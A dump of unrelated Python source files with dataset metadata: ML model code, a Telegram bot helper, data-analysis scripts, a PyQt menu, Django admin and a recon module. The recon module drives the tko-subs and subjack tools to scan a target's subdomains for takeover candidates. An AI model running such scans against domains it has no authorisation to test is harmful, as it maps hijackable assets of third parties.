tf.tile(self.query_mask, (1, 1, FLAGS.embedding_dim))\n self.query_embeddings_mask = tf.multiply(self.query_embeddings, self.query_mask)\n # self.query_embeddings = self.query_embeddings_mask\n\n self.doc_mask = tf.cast(tf.greater(self.doc, 0), tf.float32)\n self.doc_mask = tf.expand_dims(self.doc_mask, axis=2)\n self.doc_mask = tf.tile(self.doc_mask, (1, 1, FLAGS.embedding_dim))\n self.doc_embeddings_mask = tf.multiply(self.doc_embeddings, self.doc_mask)\n\n with tf.name_scope('flatten'):\n # flatten tensor after embedding\n # self.query_flatten = tf.reshape(self.query_embeddings, [-1, FLAGS.query_length * FLAGS.embedding_dim])\n # self.doc_flatten = tf.reshape(self.doc_embeddings, [-1, FLAGS.doc_length * FLAGS.embedding_dim])\n # flatten tensor after embedding and mask empty or default features\n self.query_flatten = tf.reshape(self.query_embeddings_mask, [-1, FLAGS.query_length * FLAGS.embedding_dim])\n self.doc_flatten = tf.reshape(self.doc_embeddings_mask, [-1, FLAGS.doc_length * FLAGS.embedding_dim])\n\n with tf.name_scope('dense_layer_1'):\n # query_flatten * query_w1\n self.query_w1 = tf.Variable(tf.glorot_uniform_initializer()((FLAGS.query_length * FLAGS.embedding_dim, FLAGS.query_layer_1_units)))\n self.query_layer_1 = 
tf.matmul(self.query_flatten, self.query_w1)\n\n self.doc_w1 = tf.Variable(tf.glorot_uniform_initializer()((FLAGS.doc_length * FLAGS.embedding_dim, FLAGS.doc_layer_1_units)))\n self.doc_layer_1 = tf.matmul(self.doc_flatten, self.doc_w1)\n\n self.query_layer_1_out = tf.nn.relu(self.query_layer_1)\n self.doc_layer_1_out = tf.nn.relu(self.doc_layer_1)\n \n with tf.name_scope('cosine_similarity'):\n self.cosine_similarity = tf.reduce_sum(tf.multiply(self.query_layer_1_out, self.doc_layer_1_out), axis=1, keepdims=True)\n\n with tf.name_scope('score'):\n self.score = tf.nn.sigmoid(self.cosine_similarity)\n\n with tf.name_scope('loss'):\n self.loss = tf.nn.sigmoid_cross_entropy_with_logits(logits=self.score, labels=self.label)\n\n with tf.name_scope('train'):\n self.learning_rate = tf.Variable(FLAGS.learning_rate, trainable=False)\n self.train_step = tf.train.AdamOptimizer(self.learning_rate).minimize(self.loss)\n # SGD\n\n def load_model(self, saver, sess, model_path):\n if os.path.exists(model_path + '.index'):\n saver.restore(sess, model_path)\n else:\n raise Exception(\"model_path %s not exist\" % model_path+'.index')\n exit(-1)\n\n def save_model(self, saver, sess, model_path):\n saver.save(sess, model_path)\n\nif __name__ == '__main__':\n dssm = DSSM()\n sys.exit(0)\n","sub_path":"sparse_dnn/dssm/high_order_api/dssm.py","file_name":"dssm.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"400798512","text":"# encoding=utf8\nimport sys \nreload(sys) \nsys.setdefaultencoding('utf8')\n\nimport unirest\nimport json\n\ncredentialsJson = open('credentials.json', 'r')\ncredentials = json.load(credentialsJson)\n\nTOKEN = credentials['tokenbot']\n\nBASE_URL = 'https://api.telegram.org/bot' + TOKEN + '/' \nPOLLING_URL = BASE_URL + \"getUpdates?offset=:offset:&timeout=300\"\n\nclass standardMessage():\n\tdef __init__(self, values):\n\t\tself.update_id = values['update_id']\n\t\ttry:\n\t\t\tself.message = values['message']\n\t\texcept:\n\t\t\tself.message = values['edited_message']\n\t\tself.message_id = self.message.get('message_id')\n\t\tself.date = self.message.get('date')\n\t\tself.text = self.message.get('text')\n\t\tself.fr = self.message.get('from')\n\t\tself.chat = self.message['chat']\n\t\tself.chat_id = self.chat['id']\n\n\tdef replyText(self, msg, reply=False):\n\t\tif not reply:\n\t\t\tself.message_id = 0\n\t\tsend = unirest.post(BASE_URL + 'sendMessage', \n\t\t\tparams={'chat_id': str(self.chat_id),\n\t\t\t\t\t\t'text': msg.encode('utf-8'),\n\t\t\t\t\t\t'reply_to_message_id': str(self.message_id)\n\t\t\t\t\t\t} )\n\n\tdef sendText(self, msg, reply=False):\n\t\tif not reply:\n\t\t\tself.message_id = 0\n\t\tsend = unirest.post(BASE_URL + 'sendMessage', \n\t\t\tparams={'chat_id': str(self.chat_id),\n\t\t\t\t\t\t'text': msg.encode('utf-8'),\n\t\t\t\t\t\t} )","sub_path":"src/classes.py","file_name":"classes.py","file_ext":"py","file_size_in_byte":1251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"421388502","text":"# population.py\r\n# AUTHOR NAME\r\n#\r\n# A terminal-based application for computing and printing statistics based on given input.\r\n# Detailed specifications are provided via the Assignment 5 git repository.\r\n# You must include the main listed below. You may add your own additional classes, functions, variables, etc. 
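# The reshaping this script applies to the UN tables below, shown on a tiny
# synthetic frame: pivot the long format (one row per area/year/series) into
# one column per series, then flatten the hierarchical index back into
# ordinary columns. The index/column names mirror the script; the series
# labels and values are made up.
import pandas as pd
import numpy as np

long_df = pd.DataFrame({
    'Region/Country/Area': ['Canada'] * 4,
    'Year': [2010, 2010, 2015, 2015],
    'Series': ['Population estimate', 'Population density',
               'Population estimate', 'Population density'],
    'Value': [34.0, 3.7, 35.7, 3.9],
})

wide = pd.pivot_table(long_df, values='Value',
                      index=['Region/Country/Area', 'Year'],
                      columns=['Series'], aggfunc=np.sum)
wide = wide.reset_index(level=['Region/Country/Area', 'Year'], drop=False)
print(wide)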
\r\n# You may import any modules from the standard Python library, including numpy and pandas.\r\n# Remember to include docstrings and comments.\r\n\r\n## Import librairies\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport matplotlib.pyplot as plt\r\npd.set_option(\"display.max_columns\", None)\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef main():\r\n\r\n # Stage 1: Import data\r\n\r\n\r\n ## Import data\r\n codes = pd.read_excel(\"UN Population Datasets/UN Codes.xlsx\",sheet_name=\"world_data\")\r\n population_dataset1 = pd.read_excel(\"UN Population Datasets/UN Population Dataset 1.xlsx\",sheet_name=\"Pop Growth Stats\")\r\n population_dataset2 = pd.read_excel(\"UN Population Datasets/UN Population Dataset 2.xlsx\",sheet_name=\"Pop Growth Cities\")\r\n # Data pre-processing\r\n data1=pd.pivot_table(population_dataset1, values='Value', index=['Region/Country/Area','Year'],columns=['Series'], aggfunc=np.sum)\r\n data1=data1.reset_index(level=['Region/Country/Area','Year'],drop=False)\r\n data1.dropna(subset=['Year'])\r\n\r\n data2=pd.pivot_table(population_dataset2, values='Value', index=['Region/Country/Area','Year'],columns=['Series'], aggfunc=np.sum)\r\n data2=data2.reset_index(level=['Region/Country/Area','Year'],drop=False)\r\n data2.dropna(subset=['Year'])\r\n\r\n # Merge datasets\r\n print(\"codes shape\",codes.shape[0])\r\n print(\"data1 shape\",data1.shape[0])\r\n print(\"data2 shape\",data2.shape[0])\r\n countries_stats1=pd.merge(codes, data1, left_on='Country',right_on='Region/Country/Area', how='inner', suffixes=('', '_drop'))\r\n countries_stats1=countries_stats1.drop(['Region/Country/Area'], axis=1)\r\n print(\"countries_stats1 shape\",countries_stats1.shape[0])\r\n countries_stats=pd.merge(countries_stats1, data2, left_on=['Country','Year'],right_on=['Region/Country/Area','Year'], how='inner', suffixes=('', '_drop'))\r\n countries_stats=countries_stats.drop(['Region/Country/Area'], axis=1)\r\n countries_stats.dropna(subset=['Year'])\r\n print(\"countries_stats shape\",countries_stats.shape[0])\r\n # set hierarchical index 'UN Region', 'UN Sub-Region','Year'\r\n index = pd.MultiIndex.from_frame(countries_stats[['UN Region', 'UN Sub-Region','Year']])\r\n countries_stats.set_index(index,inplace=True)\r\n idx = pd.IndexSlice\r\n countries_stats=countries_stats.sort_index()\r\n\r\n # Describe combined dataset\r\n print(\"\\n Description of dataset: \\n\")\r\n print(countries_stats.describe())\r\n\r\n # Print Average statistics per region and year using aggregation with the mean function\r\n print(\"\\n Average statistics per region and year: \\n \")\r\n countries_stats_=countries_stats.drop(['Year','UN Region'], axis=1)\r\n print(countries_stats_.groupby(['UN Region', 'Year']).mean())\r\n\r\n\r\n # Plot Population annual rate of increase (percent) for each region\r\n p1 = pd.pivot_table(countries_stats_, values='Population annual rate of increase (percent)', index=['UN Region', 'Year'],\r\n aggfunc=np.mean)\r\n p1=p1.reset_index()\r\n print(p1)\r\n fig = plt.figure()\r\n ax = fig.add_axes([0, 0, 1, 1])\r\n ax.bar( p1['UN Region'], p1['Population annual rate of increase (percent)'], color='b')\r\n ax.set_ylabel('Annual Rate')\r\n ax.set_title('Population annual rate of increase (percent)')\r\n plt.tight_layout()\r\n plt.subplots_adjust(top=0.88)\r\n plt.savefig('books_read.png',bbox_inches='tight')\r\n\r\n # Count Missing values per columns of the combined dataset\r\n print(\"\\n Count Missing Values per columns \\n \")\r\n 
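# A compact look at the DataFrame.eval() trick used just below: backtick
# quoting lets the expression reference column names that contain spaces and
# parentheses, and the boolean result is cast to 0/1 flags. Tiny synthetic frame:
import pandas as pd

df = pd.DataFrame({'Population annual rate of increase (percent)': [-0.3, 1.2]})
df['pop_decrease'] = df.eval(
    '`Population annual rate of increase (percent)` < 0').astype(int)
print(df['pop_decrease'].tolist())  # [1, 0]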
print(countries_stats.isnull().sum())\r\n\r\n # Add new variable popo_decrease to define countries that have negatif Population annual rate of increase (percent)\r\n countries_stats['pop_decrease']= countries_stats.eval('`Population annual rate of increase (percent)`<0').astype(int)\r\n # Add new variable females_lives_more_than_males to define countries that have negatif Life expectancy at birth for females (years)`>`Life expectancy at birth for males (years)\r\n countries_stats['females_lives_more_than_males']= countries_stats.eval('`Life expectancy at birth for females (years)`>`Life expectancy at birth for males (years)`').astype(int)\r\n\r\n # Liste of countries where their population decrease per region and year\r\n print('Number of countries where their population decrease')\r\n countries_stats_=countries_stats.drop(['Year','UN Region'], axis=1)\r\n print(countries_stats_[countries_stats_['pop_decrease']==1].groupby(['UN Region','Year']).count()['pop_decrease'])\r\n\r\n # Liste of countries where males lives than females per region and year\r\n print('Number of countries where males lives than females')\r\n print(countries_stats_[countries_stats_['females_lives_more_than_males']==0].groupby(['UN Region', 'Year']).count()['females_lives_more_than_males'])\r\n\r\n\r\n #Define function region_valid to raise error when the sub-region doesn't exist\r\n def region_valide(sub_region):\r\n if sub_region not in countries_stats['UN Sub-Region'].unique():\r\n raise ValueError(\"You must enter a valid UN sub-region name\")\r\n\r\n #Using the while functionality, the user can enter many time the sub-region name until he enter a valid name\r\n sub_region = None\r\n while sub_region is None:\r\n input_value = str(input(\"Please enter a sub-region name: \"))\r\n try:\r\n # try and convert the string input to a number\r\n region_valide(input_value)\r\n sub_region=input_value\r\n except ValueError:\r\n # tell the user off\r\n print(\"You must enter a valid UN sub-region name\".format(input=input_value))\r\n\r\n print(\"\\n\")\r\n print(\"The dataset contain informations of these years: \" ,countries_stats['Year'].unique())\r\n # Define function year_valid to raise error when the year s not valid doesn't exist or not integer type\r\n def year_valide(user_year):\r\n if int(user_year) not in countries_stats['Year'].unique() or not isinstance(user_year,int):\r\n raise ValueError(\"You must enter a valid year\")\r\n\r\n # Using the while functionality, the user can enter many time the year until he enter a valid name\r\n\r\n year = None\r\n\r\n while year is None:\r\n input_year = input(\"Please enter a year: \")\r\n try:\r\n input_year=int(input_year)\r\n year_valide(input_year)\r\n year = input_year\r\n except ValueError:\r\n # tell the user off\r\n print(\"You must enter a valid year\".format(input=input_year))\r\n\r\n ## Select data concerning the sub region and the chosen year\r\n regions_stats=countries_stats.loc[idx[:,sub_region,year],:]\r\n\r\n # Print average statistics of the sub_region in the chosen year\r\n print('\\n')\r\n print(\"Average Statistics of sub region {} in {}:\".format(sub_region,year))\r\n print(\"\\n\")\r\n print(regions_stats.iloc[:,4:].mean())\r\n\r\n # Print 3 countries with the lower rate fertility in the region\r\n print(\"\\n 3 countries with the lower rate fertility in the region \\n\")\r\n regions_stats_ = regions_stats.drop(['Year', 'UN Region'], axis=1)\r\n print(regions_stats_.nsmallest(3, 'Total fertility rate (children per women)')[['Country','Total fertility rate 
(children per women)']])\r\n\r\n # Print Top 3 countries with the best rate fertility in the region\r\n print(\"\\n Top 3 countries with the best Life expectancy at birth in the region \\n\")\r\n regions_stats_ = regions_stats.drop(['Year', 'UN Region'], axis=1)\r\n print(regions_stats_.nlargest(3, 'Life expectancy at birth for both sexes (years)')[['Country','Life expectancy at birth for both sexes (years)']])\r\n\r\n\r\n # Export countries_stats dataframe\r\n countries_stats.to_excel(\"countries_stats.xlsx\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"Population-vf.py","file_name":"Population-vf.py","file_ext":"py","file_size_in_byte":8090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"240906112","text":"import os, time\nfrom core import execute\nfrom core import slack\nfrom core import utils\n\nfrom pprint import pprint \n\nclass TakeOverScanning(object):\n def __init__(self, options):\n utils.print_banner(\"Scanning for Subdomain TakeOver\")\n self.module_name = self.__class__.__name__\n self.options = options\n slack.slack_noti('status', self.options, mess={\n 'title': \"{0} | {1}\".format(self.options['TARGET'], self.module_name),\n 'content': 'Start Scanning TakeOver for {0}'.format(self.options['TARGET'])\n })\n self.initial()\n utils.just_waiting(self.module_name)\n\n self.conclude()\n slack.slack_noti('good', self.options, mess={\n 'title': \"{0} | {1} \".format(self.options['TARGET'], self.module_name),\n 'content': 'Done Scanning TakeOver for {0}'.format(self.options['TARGET'])\n })\n\n\n def initial(self):\n if self.options['DEBUG'] == \"True\":\n self.tko_subs()\n else:\n self.tko_subs()\n self.subjack()\n\n def tko_subs(self):\n utils.print_good('Starting tko-subs')\n cmd = '$GO_PATH/tko-subs -data $PLUGINS_PATH/providers-data.csv -domains $WORKSPACE/subdomain/final-$TARGET.txt -output $WORKSPACE/subdomain/takeover-$TARGET-tko-subs.txt'\n\n cmd = utils.replace_argument(self.options, cmd)\n output_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/takeover-$TARGET-tko-subs.txt')\n std_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/std-takeover-$TARGET-tko-subs.std')\n execute.send_cmd(cmd, output_path, std_path, self.module_name)\n\n\n def subjack(self):\n utils.print_good('Starting subjack')\n cmd = '$GO_PATH/subjack -w $WORKSPACE/subdomain/final-$TARGET.txt -t 100 -timeout 30 -o $WORKSPACE/subdomain/takeover-$TARGET-subjack.txt -ssl'\n\n cmd = utils.replace_argument(self.options, cmd)\n output_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/takeover-$TARGET-subjack.txt')\n std_path = utils.replace_argument(self.options, '$WORKSPACE/subdomain/std-takeover-$TARGET-subjack.std')\n execute.send_cmd(cmd, output_path, std_path, self.module_name)\n\n\n #update the main json file\n def conclude(self):\n\n main_json = utils.reading_json(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'))\n main_json['Modules'][self.module_name] = utils.checking_done(module=self.module_name, get_json=True)\n\n #write that json again\n utils.just_write(utils.replace_argument(self.options, '$WORKSPACE/$COMPANY.json'), main_json, is_json=True)\n \n #logging\n logfile = utils.replace_argument(self.options, '$WORKSPACE/log.json')\n utils.save_all_cmd(logfile)\n utils.print_banner(\"{0} 
Done\".format(self.module_name))\n\n\n\n\n\n","sub_path":"modules/takeover.py","file_name":"takeover.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"344254277","text":"#!/usr/bin/python3\n\nfrom xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nimport sys\nimport urllib.request\n\nclass myContentHandler(ContentHandler):\n\n def __init__ (self):\n self.inItem = False\n self.inContent = False\n self.theContent = \"\"\n self.file = open(\"contenidos.html\", \"w\")\n self.line = \"\"\n\n def startElement (self, name, attrs):\n if name == 'item':\n self.inItem = True\n elif self.inItem:\n if name == 'title':\n self.inContent = True\n elif name == 'link':\n self.inContent = True\n \n def endElement (self, name):\n if name == 'item':\n self.inItem = False\n elif self.inItem:\n if name == 'title':\n self.line = \"Titulo de la noticia: \" + self.theContent + \".\"\n # To avoid Unicode trouble\n print (self.line)\n self.file.write(self.line)\n self.inContent = False\n self.theContent = \"\"\n elif name == 'link':\n self.link = self.theContent\n links = \"
Enlace noticia: \" + self.link + \"
\\n\"\n print (links)\n self.file.write(links)\n self.inContent = False\n self.theContent = \"\"\n self.link = \"\"\n\n def characters (self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n\n \n# --- Main prog\n\ntheParser = make_parser()\ntheHandler = myContentHandler()\ntheParser.setContentHandler(theHandler)\n\nurl = \"http://barrapunto.com/index.rss\"\nxmlStream = urllib.request.urlopen(url)\ntheParser.parse(xmlStream)\n\nprint (\"Parse complete\")","sub_path":"xml-parser-barrapunto.py","file_name":"xml-parser-barrapunto.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"445886135","text":"from PyQt4.QtGui import *\r\nfrom PyQt4 import QtGui\r\nfrom PyQt4.QtCore import *\r\nimport shutil\r\n\r\n\r\nfrom profile_sql_connections import *\r\n\r\nclass Menu(QMenu):\r\n \"\"\"A class to represent the menu bar for the profile\"\"\"\r\n def __init__(self,parent):\r\n super().__init__()\r\n self.parent=parent\r\n self.MenuBar=QMenuBar()\r\n #create actions\r\n\r\n self.change_picture=QAction(\"Change Picture\",self)\r\n\r\n self.add_trick=QAction(\"Add Trick\", self)\r\n\r\n self.add_skatepark=QAction(\"Add Skatepark\",self)\r\n\r\n self.add_review=QAction(\"Add Review\",self)\r\n\r\n self.contact_support=QAction(\"Contact Support\",self)\r\n\r\n\r\n \r\n #create options\r\n self.profile_menu=self.MenuBar.addMenu(\"Profile\")\r\n self.tricks_menu=self.MenuBar.addMenu(\"Tricks\")\r\n self.skateparks_menu=self.MenuBar.addMenu(\"Skateparks\")\r\n self.reviews_menu=self.MenuBar.addMenu(\"Reviews\")\r\n self.support_menu=self.MenuBar.addMenu(\"Support\")\r\n \r\n\r\n #add actions to menu\r\n\r\n self.profile_menu.addAction(self.change_picture)\r\n\r\n self.tricks_menu.addAction(self.add_trick)\r\n\r\n self.skateparks_menu.addAction(self.add_skatepark)\r\n\r\n self.reviews_menu.addAction(self.add_review)\r\n\r\n self.support_menu.addAction(self.contact_support)\r\n\r\n #connections\r\n\r\n self.change_picture.triggered.connect(self.change_picture_connection)\r\n self.add_trick.triggered.connect(self.add_trick_connection)\r\n self.add_skatepark.triggered.connect(self.add_skatepark_connection)\r\n self.add_review.triggered.connect(self.add_review_connection)\r\n self.contact_support.triggered.connect(self.contact_support_connection)\r\n\r\n\r\n def contact_support_connection(self):\r\n self.parent.tabs.setCurrentIndex(4)\r\n print(\"Contact Support\")\r\n\r\n def add_review_connection(self):\r\n self.parent.tabs.setCurrentIndex(3)\r\n self.parent.reviews_tab.add_review_stacked()\r\n print(\"add Trick\")\r\n\r\n\r\n def change_picture_connection(self):\r\n self.parent.StatusBar.showMessage(\"Changing Profile Picture...\")\r\n self.parent.tabs.setCurrentIndex(0)\r\n print(\"Find Picture\")\r\n path=QFileDialog.getOpenFileName()\r\n \r\n if path==\"\":\r\n print(\"Picture not changed.\")\r\n self.parent.StatusBar.showMessage(\"Profile Picture Not Changed.\",2000)\r\n else:\r\n replace=\"\\.\"\r\n path=path.replace(\"/\",replace[0])\r\n destination=(\"{0}{1}{2}\".format(os.getcwd(),replace[0],\"ProfilePicture.jpeg\"))\r\n print(destination)\r\n print(path)\r\n shutil.copy2(path,destination)\r\n self.connection=ProfileSQLConnections()\r\n self.connection.change_picture(destination)\r\n print(path)\r\n self.parent.StatusBar.showMessage(\"Profile Picture Successfully Changed.\",2000)\r\n\r\n def add_trick_connection(self):\r\n self.parent.tabs.setCurrentIndex(1)\r\n 
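# The copy in change_picture_connection above, restated with the standard
# library doing the path work instead of the manual '/' to '\\' replacement;
# os.path.join keeps it portable across platforms and shutil.copy2 also
# preserves file timestamps. A hypothetical helper, not the app's code:
import os
import shutil

def copy_profile_picture(source_path, workdir=None):
    """Copy the chosen image into the working directory as ProfilePicture.jpeg."""
    workdir = workdir or os.getcwd()
    destination = os.path.join(workdir, 'ProfilePicture.jpeg')
    shutil.copy2(source_path, destination)
    return destination

# copy_profile_picture('/tmp/me.jpeg')  # example call with a made-up path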
self.parent.tricks_tab.add_trick_stacked()\r\n print(\"add Trick\")\r\n\r\n def add_skatepark_connection(self):\r\n self.parent.tabs.setCurrentIndex(2)\r\n self.parent.skateparks_tab.view_add_skatepark()\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"Implementation/Development/menu_bar.py","file_name":"menu_bar.py","file_ext":"py","file_size_in_byte":3272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"310854210","text":"#!/usr/bin/env python\r\n'''\r\ndelegatorsListing b0.09\r\n'''\r\n\r\n# Import librarys\r\n# ------------------------------------------------------------------------------\r\nimport csv\r\nimport time\r\nimport json\r\nimport urllib.request\r\nfrom collections import defaultdict\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nfrom datetime import datetime\r\nfrom time import time\r\ntry:\r\n import winsound\r\nexcept ImportError:\r\n # Fake winsound lets you call Beep/PlaySound/MessageBeep without doing anything/ intersting thanks\r\n winsound = type('', (), {'__getattr__': lambda *a: lambda *a, **kw: None})()\r\n\r\n\r\nENDPOINTS = {\r\n 'profile': 'https://tradescan.switcheo.org/get_profile?account=%s',\r\n 'validators': 'https://tradescan.switcheo.org/get_all_validators',\r\n 'validator_delegations': 'https://tradescan.switcheo.org/staking/validators/%s/delegations'\r\n}\r\n\r\n\r\ndef get_json(url):\r\n with urllib.request.urlopen(url) as req:\r\n return json.loads(req.read().decode())\r\n\r\n\r\ndef get_profile(k_v):\r\n addr, total = k_v\r\n total = int(total / 100000000)\r\n payload = get_json(ENDPOINTS['profile'] % addr)\r\n last_seen = datetime.fromisoformat(payload['last_seen_time'][:19])\r\n return [addr, last_seen, total]\r\n\r\n\r\n# Init time\r\n# ------------------------------------------------------------------------------\r\ninitTime = int(time())\r\n\r\n# Get all delegators from all bonded validators\r\n# ------------------------------------------------------------------------------\r\nvalidators = [d for d in get_json(ENDPOINTS['validators']) if d['bond_status'] == 'bonded']\r\ndelegators = defaultdict(int)\r\n\r\nfor v in validators:\r\n for i, d in enumerate(get_json(ENDPOINTS['validator_delegations'] % v['operator_address'])['result']):\r\n delegators[d['delegator_address']] += float(d['balance']['amount'])\r\n print(f'+{i+1:4} delegator totals from {v[\"description\"][\"moniker\"]}')\r\n\r\n\r\n# Get all delegators profiles to find the last_seen time\r\n# ------------------------------------------------------------------------------\r\nwith open('delegator_info.csv', 'w') as f:\r\n writer = csv.writer(f)\r\n\r\n with ThreadPoolExecutor(max_workers=8) as executor:\r\n for row in executor.map(get_profile, delegators.items()):\r\n writer.writerow(row)\r\n print(*row)\r\n\r\n\r\n# End of process alerter and duration\r\n# ------------------------------------------------------------------------------\r\nnewTimestamp = int(time())\r\nprocessTime = newTimestamp - initTime\r\nprint('Snapshot Duration:', processTime, 'seconds')\r\nwinsound.Beep(550, 250)\r\nwinsound.Beep(650, 350)\r\n","sub_path":"CocoeoStats b0.09.py","file_name":"CocoeoStats b0.09.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"285393251","text":"from django.contrib import admin\nfrom producto.models import UnidadMedida, Categoria, Producto, PrecioVentaProducto, PrecioCompraProducto, InsercionInmediata, SustraccionInmediata\nfrom 
venta.models import DetalleVenta\nfrom compra.models import DetalleCompra\nfrom producto.models import Producto\nfrom producto.forms import InsercionInmediataForm, SustraccionInmediataForm, PrecioVentaProductoForm, PrecioCompraProductoForm\n\n# Register your models here.\nclass UnidadMedidaAdmin(admin.ModelAdmin):\n\tlist_display = ('nombre', 'abreviatura', )\n\tordering = ('nombre',)\n\tsearch_fields = ('nombre','abreviatura')\n\nadmin.site.register(UnidadMedida, UnidadMedidaAdmin)\n\n\nclass CategoriaAdmin(admin.ModelAdmin):\n\tlist_display = ('nombre',)\n\tordering = ('nombre',)\n\tsearch_fields = ('nombre',)\n\nadmin.site.register(Categoria, CategoriaAdmin)\n\nclass PrecioCompraProductoInline(admin.TabularInline):\n model = PrecioCompraProducto\n form = PrecioCompraProductoForm\n extra = 1\n\nclass PrecioVentaProductoInline(admin.TabularInline):\n model = PrecioVentaProducto\n form = PrecioVentaProductoForm\n extra = 1\n\nclass ProductoAdmin(admin.ModelAdmin):\n\tinlines = (PrecioCompraProductoInline, PrecioVentaProductoInline,)\n\tlist_display = ('codigo','nombre','get_cantidad', )\n\tordering = ('codigo','nombre',)\n\tsearch_fields = ('codigo','nombre')\n\tfilter_horizontal = ('proveedor',)\n\t\n\tdef get_cantidad(self, instance):\n\t\treturn instance.get_cantidad()\n\t\t\n\tget_cantidad.short_description = \"Cantidad\"\n\nadmin.site.register(Producto, ProductoAdmin)\n\n\nclass InsercionInmediataAdmin(admin.ModelAdmin):\n\tform = InsercionInmediataForm\n\tlist_display = ('producto', 'cantidad', 'observacion', 'fecha_hora', )\n\tordering = ('-fecha_hora',)\n\tsearch_fields = ('producto.codigo','producto.nombre', 'observacion',)\n\nadmin.site.register(InsercionInmediata, InsercionInmediataAdmin)\n\nclass SustraccionInmediataAdmin(admin.ModelAdmin):\n\tform = SustraccionInmediataForm\n\tlist_display = ('producto', 'cantidad', 'observacion', 'fecha_hora', )\n\tordering = ('-fecha_hora',)\n\tsearch_fields = ('producto.codigo','producto.nombre', 'observacion',)\n\nadmin.site.register(SustraccionInmediata, SustraccionInmediataAdmin)\n\n","sub_path":"producto/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
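# For reference, the computed-column pattern ProductoAdmin uses above, in a
# minimal self-contained form: any ModelAdmin method can be listed in
# list_display, and its short_description attribute sets the column header.
# Assumes a configured Django project; the model and field names below are
# illustrative, not from this project.
from django.contrib import admin

class ItemAdmin(admin.ModelAdmin):
    list_display = ('nombre', 'get_stock')

    def get_stock(self, instance):
        # Delegate to a model method, exactly as get_cantidad delegates above.
        return instance.get_stock()

    get_stock.short_description = "Stock"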